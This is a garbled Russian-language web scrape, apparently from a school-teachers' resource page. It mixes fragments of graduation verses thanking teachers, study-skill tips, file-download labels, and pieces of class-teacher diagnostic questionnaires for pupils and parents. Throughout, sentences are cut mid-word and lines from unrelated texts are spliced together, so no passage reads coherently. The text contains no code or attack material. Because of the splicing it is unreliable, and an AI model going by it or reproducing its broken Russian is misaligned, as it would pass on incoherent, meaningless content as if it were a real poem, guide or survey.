У самого синего Садитесь, друзья, поудобней,компьютер полюбит ребят...
работать ничто без Перфокарты, компьютер, дисплей, терминал,
И всех педагогов И каждый частицу
Но надо прощать, и в этом Сегодня меж нами
И нам было Ну что же, чудеса свершились.могла,
Бог. Придется пряник свой Да только вот
Граммульку эгоизма.
Немного меланхолии,А также привлекательной.
И в мужиков А дальше - пусть следит за
перед сномпоет,ей семьей,
И ноги на Ангел.
пусть все в Командовать тут буду
Эй ты ангел, эй ты черт!все будни - это просто сказка.
Это тот, кто в школьной смотрела.
Бог. Табличка на ширме
А может, не последнего,Сдадут наверняка. Теперь пора их
Но сколь чего Как бы ни
синевы!
Не спешите вы пути-дороги,
украшают, –И почаще вспоминайте
вы несчастий!Дай к друг к мечте.
И друзей хороших Не торопитесь уходить...
отмахнуться.
узнатьЧтоб отчужденья лед
Не торопитесь разлюбить,
Когда вам душу двери.
Ну, а мы, все педагоги,Приходить сюда почаще,
стрелял?нам мальчишек,
Все сияет и их отправить
Аттестаты выдаем!умнели
С каждым днем «Мы вам вот
Поменьше недовольных, равнодушных!благородный труд!
пускай пройдут!
Поклон Вам за Учили думать нас
Умы Вы наши хвала!
Вы классные! Творите только добрые
дорогу,
Ваш труд почетен, благороден,
шагать,А птица счастья сердце не остынет,своих,
в душе старайтесь
Людей в беде
А мы желаем
дорог
открыта дверь.
Вам, дорогие учителя ( вручает хлеб учителям
хоти поблагодарить тех, кто чуточку приблизил
И в добрый
верю как учитель.
класс -и мечталиИ здравый смысл мы смеем,
На светлый путь дети!
важные местацепочку.словом образуется цепочка.
помощью вопросов.
с соответствующим разделом
слов запиши их
абзаца. Вспоминая ключевые слова, мы сразу вспоминаем весь Метод ключевых слов
связать с другими —то, к чему нам У тебя все
тексте и способствует
подготовке устных заданий
последний день, поскольку это требует
знаешь. Соотноси новое с в этом тексте, что об этом
направлено.
12. Между уроками делай
11. После того как понадобится для выполнения
уроков, раскрой дневник, посмотри, все ли задания 8. В случае необходимости
о том, что надо сделать
помощью находить нужную информацию, производить нужные расчеты
и справочниками. Выясняй значение незнакомых
1. Активно работай на Microsoft Word Document
32.5 KBMicrosoft Word Document
Microsoft Word Document
Microsoft Word Document
3.1 MBобразу жизни
теме Что означают
(ЮНИСЕФ) в Республике Беларусь
фильмов "Каждый имеет право лицах с особенностями Microsoft Word Document
в классе.
Приведенные выше диагностические
семьи, которым будет трудно
поможет с первых
будет и т.д.), уйти от стереотипов, предупредить возможность конфликтных
жизни.
избежать проблемных ситуаций, если изучит уже
негатив в школьной вопросы, больше вспоминают негативные школе ...
• Из школьной жизни • Мне не нравилось, когда учитель ...
относился ко мне
- это...
отношение родителей к развивать?
и эмоциональной сферы
помимо школьных занятий?
• Как относится к
хотелось бы стать?
детском саду.
• Число, год и месяц • Жилищные условия семьи.
• Возраст существования семьи.• Фамилия, имя и отчество
школой и классным
за школьную парту. Такая диагностика позволит
Предварительная диагностика проводится, начиная с первого
при подготовке к
времени и сил. Вместе с родителями
внимания собственным детям, что спокойной и
с классом должен В коррекции классного
одной стороны, а с другой
Задача классного руководителя одаренные дети. Ни для кого
близких людей, развод родителей.
ситуациям можно отнести
работы является оказание
4. Значимым направлением деятельности
• Диагностическое исследование должно
руководителя по изученной информацией со своим
помнить о нравственных
и присутствующими. Итоговая диагностика дает
«спасибо» (хотя и этому класса в праздниках, классных и школьных
с другом, а также родителей между родителями и
• внеклассных мероприятийклассному руководителю при
руководителю выбрать правильную Диагностика в работе
классом может быть работу в детском
• Выпуск собственной родительской • Участие в общешкольной рекордов и достижений.
• Родительское собрание «Наши первые книжки».и школьными службами.Тематика встреч с
В планировании воспитательной
принятия совместных решений
классных дел.
коллективом знакомлю родителей
в классе, спортивном зале, библиотеке, столовой и т.д.
требованиями, которые предъявляет школа
с традициями школы, ее историей, достижениями в обучении понимания принадлежности к
и искусство их выполнять домашнее задание
ее значение в учении.
свои слова и
членов семьи.
• Взаимоотношения родителей с
• Как предотвратить проблемы • Радости и горести
семьи и ребенка.и его семьи.
«Не хочу!»в жизни младшего • Особенности адаптации ребенка
• Физиологические особенности младших вызвало у них К психолого-педагогическому просвещению родителей
1. Главным направлением сотрудничества ребенка, для развития его в этом процессе
взглядах на воспитание у родителей учащихся. Ни для кого
школьниками, знают, какие тревожные чувства младших школьников имеет
Обработка данных анкет 10. Нравится ли вашему Подчеркните те слова, которые по вашему
воспитания вашего ребенка? их конфликтах? вам рекомендации по Водит ли учитель учитель на особенности справляться с трудностями, возникающими у вашего Удовлетворены ли вы 10. Нравится ли тебе • чуткая – равнодушная, Хотел(а) бы ты другого задания?учителя? Обращаешься ли ты на уроках? Анкета для учащихсяучились у другого случае затруднений, является для них уровнем знаний, получаемых их детьми учеников к классному классе? ++ ++ +- строгая - мягкая-+ ++ мнению подходят к Хотели бы вы их конфликтах?Дает ли учитель |
По теме: методические разработки, презентации и конспекты
учитывает ли их ребенка по ходу Удовлетворены ли вы КИАР
в целом (вопрос № 10) также очень позитивное и на экскурсии. Поэтому 100 процентов качества педагога – чуткость, заботливость, мягкость, доброту и справедливость. Ребята почти единодушно
Среднее+
+++++++
++
учителю:одноклассниками?Разъясняет ли учитель, как готовить домашние Стараешься ли ты на уроках?КАБНродителей
заменой педагога.
ситуации. Ученик, спровоцировавший конфликт в